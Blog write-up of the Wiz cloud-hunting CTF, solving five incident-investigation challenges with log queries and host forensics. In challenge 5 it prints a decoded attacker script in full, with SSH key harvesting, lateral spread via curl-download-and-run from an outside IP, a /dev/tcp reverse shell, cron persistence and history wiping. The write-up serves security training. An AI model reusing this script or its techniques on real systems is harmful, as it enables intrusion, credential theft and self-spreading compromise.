WIZ CTF shared

Published 2025-05-08, updated 2025-05-08. Author: Ivoripuion. Tags: cloud security, CTF. Word count: 1.5k, reading time: 8 minutes.

I noticed that WIZ is running an online CTF, so I played it after work. Link: https://www.cloudhuntinggames.com/
## Challenge 1

Quite a few log entries contain the string Fiz, which comes from the attacker's email address. So search the request logs for every related entry:
```sql
SELECT * FROM s3_data_events WHERE requestParameters like '%Fiz%'
```
One entry's IAM identity contains drink, so that's the one:

Flag for challenge 1: arn:aws:sts::509843726190:assumed-role/S3Reader/drinks

## Challenge 2

Search the logs related to drinks:
```sql
SELECT * FROM cloudtrail WHERE requestParameters like "%drink%"
```
It's right there:

Flag for challenge 2: Moe.Jito

## Challenge 3

The answer to this one follows straight from the challenge description: look in userIdentity_ARN for strings containing i-:
```sql
SELECT * FROM cloudtrail WHERE UserAge like "%i-%"
```
One log entry looks odd:

The instance id of that machine is the flag.

Flag for challenge 3: i-0a44002eec2f16c25

## Challenge 4

With no logs showing up, I suspected the log directory had been mounted over, so I checked:
```
root@ssh-fetcher:~
TARGET       SOURCE                                                           FSTYPE  OPTIONS
/            overlay[/work/rootfs]                                            overlay ro,relatime,lowerdir=/var/lib/contai
|-/var/log   overlay[/work/storage/4ca0f801-78c1-427b-ab34-adbb86a97233/log] overlay rw,relatime,lowerdir=/var/lib/contai
| `-/var/log overlay[/work/rootfs/tmp/.../mnt]                                overlay ro,relatime,lowerdir=/var/lib/contai
|-/dev/null  tmpfs[/null]                                                     tmpfs   rw,nosuid,size=65536k,mode=755,inode
`-/proc      none                                                             proc    ro,relatime
```
After unmounting it, the logs can be read directly:
```
root@ssh-fetcher:~
root@ssh-fetcher:~
iPhpts/0102.54.197.238
root@ssh-fetcher:~
```
Flag for challenge 4: 102.54.197.238

## Challenge 5

Find the crontab, then the script it runs on schedule:
```
root@postgresql-service:~
0 0 * * * bash /var/lib/postgresql/data/pg_sched
root@postgresql-service:~
echo "<base64 blob omitted here; the decoded script follows>" | base64 -d | bash
```
The base64-decoded result:
```bash
#!/bin/bash

# List of interesting policies
VULNERABLE_POLICIES=("AdministratorAccess" "PowerUserAccess" "AmazonS3FullAccess" "IAMFullAccess" "AWSLambdaFullAccess" "AWSLambda_FullAccess")

SERVER="34.118.239.100"
PORT=4444
USERNAME="FizzShadows_1"
PASSWORD="Gx27pQwz92Rk"
CREDENTIALS_FILE="/tmp/c"

SCRIPT_PATH="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" &>/dev/null && pwd)/$(basename -- "${BASH_SOURCE[0]}")"

# Check if a command exists
check_command() {
    if ! command -v "$1" &> /dev/null; then
        install_dependency "$1"
    fi
}

# Install missing dependencies
install_dependency() {
    local package="$1"
    if [[ "$package" == "curl" ]]; then
        apt-get install curl -y &> /dev/null
        yum install curl -y &> /dev/null
    elif [[ "$package" == "unzip" ]]; then
        apt-get install unzip -y &> /dev/null
        yum install unzip -y &> /dev/null
    elif [[ "$package" == "aws" ]]; then
        install_aws_cli
    fi
}

# Install AWS CLI locally
install_aws_cli() {
    mkdir -p "$HOME/.aws-cli"
    curl -s "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "$HOME/.aws-cli/awscliv2.zip"
    unzip -q "$HOME/.aws-cli/awscliv2.zip" -d "$HOME/.aws-cli/"
    "$HOME/.aws-cli/aws/install" --install-dir "$HOME/.aws-cli/bin" --bin-dir "$HOME/.aws-cli/bin"

    # Add AWS CLI to PATH
    export PATH="$HOME/.aws-cli/bin:$PATH"
    echo 'export PATH="$HOME/.aws-cli/bin:$PATH"' >> "$HOME/.bashrc"
}

# Try to spread
spread_ssh() {
    find_and_execute() {
        local KEYS=$(find ~/ /root /home -maxdepth 5 -name 'id_rsa*' | grep -vw pub;
                     grep IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}';
                     find ~/ /root /home -maxdepth 5 -name '*.pem' | sort -u)

        local HOSTS=$(grep HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}';
                      grep -E "(ssh|scp)" ~/.bash_history /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b";
                      grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null |
                      grep -vw 127.0.0.1 | sort -u)

        local USERS=$(echo "root";
                      find ~/ /root /home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa' | awk -F'/' '{print $3}' | grep -v ".ssh" | sort -u)

        for key in $KEYS; do
            chmod 400 "$key"
            for user in $USERS; do
                echo "$user"
                for host in $HOSTS; do
                    ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i "$key" "$user@$host" "(curl -u $USERNAME:$PASSWORD -o /dev/shm/controller http://$SERVER/files/controller && bash /dev/shm/controller)"
                done
            done
        done
    }

    find_and_execute
}

create_persistence() {
    (crontab -l 2>/dev/null; echo "0 0 * * * bash $SCRIPT_PATH") | crontab -
}

create_shell () {
    echo "Creating a reverse shell"
    /bin/bash -i >& /dev/tcp/"$SERVER"/"$PORT" 0>&1
}

# Check role policies
check_role_vuln() {
    local ROLE_NAME=$(aws sts get-caller-identity --query "Arn" --output text | awk -F'/' '{print $2}')

    # List attached policies for the given role
    attached_policies=$(aws iam list-attached-role-policies --role-name "$ROLE_NAME" --query 'AttachedPolicies[*].PolicyName' --output text)

    # Check if the user has IAM permissions to list policies
    if [[ $? -eq 0 ]]; then
        # If the user has IAM permissions, check attached policies
        attached_policies_array=($attached_policies)
        for policy in "${attached_policies_array[@]}"; do
            for vuln_policy in "${VULNERABLE_POLICIES[@]}"; do
                if [[ "$policy" == "$vuln_policy" ]]; then
                    return 0
                fi
            done
        done
    else
        aws s3 ls
        if [[ $? -eq 0 ]]; then
            return 0
        else
            aws lambda list-functions
            if [[ $? -eq 0 ]]; then
                return 0
            else
                return 1
            fi
        fi
    fi
}

# Check required dependencies
check_command "curl"
check_command "unzip"
check_command "aws"

check_role_vuln
if [[ $? -eq 0 ]]; then
    create_shell
else
    create_persistence
    spread_ssh
    cat /dev/null > ~/.bash_history
fi
```
Curling the server referenced in the script shows that it is a file server:
```
root@postgresql-service:~
(ASCII-art banner)

Available Endpoints:
------------------
1. List All Files
   GET /files
   Returns a list of all files in the system.
2. Upload File
   POST /files/upload
   Upload a new file to the system.
3. Download File
   GET /files/(unknown)
   Download a specific file by name.
4. Delete File
   DELETE /files/(unknown)
   Remove a file from the system.

Response Codes:
-------------
200 - Success
401 - Unauthorized (Invalid credentials)
403 - Forbidden (Access denied)
404 - File not found
500 - Server error
```
List the files:
```
root@postgresql-service:~
Size     Date Modified   Name
--------------------------------------------------
4.0KB    Jan 23 14:35    Root Beer.txt
5.0KB    Jan 23 12:35    Man-in-the-Mojito.txt
3.5KB    Jan 23 13:35    ExfilCola-Top-Secret.txt
4.5KB    Jan 23 15:35    Prigat Overflow.txt
10.0KB   Jan 23 16:35    controller
2.4MB    Jan 27 12:35    Q3_2023_Financial_Report.pdf
1.2MB    Feb 06 12:35    2024_budget_planning.xlsx
960.0KB  Jan 24 12:35    employee_directory.xlsx
1.5MB    Feb 11 12:35    taste_test_results_oct2023.xlsx
3.5MB    Feb 16 12:35    bottling_line_specs_v2.pdf
```
Delete the secret cola recipe file ExfilCola-Top-Secret.txt and that's it:
```
root@postgresql-service:~
00/files/ExfilCola-Top-Secret.txt
Success! You've deleted the secret recipe before it could be exposed. The flag is: {I know it when I see it}
```
Flag for challenge 5: {I know it when I see it}

## Certificate

Once you finish, a certificate is issued; the email address can be anything: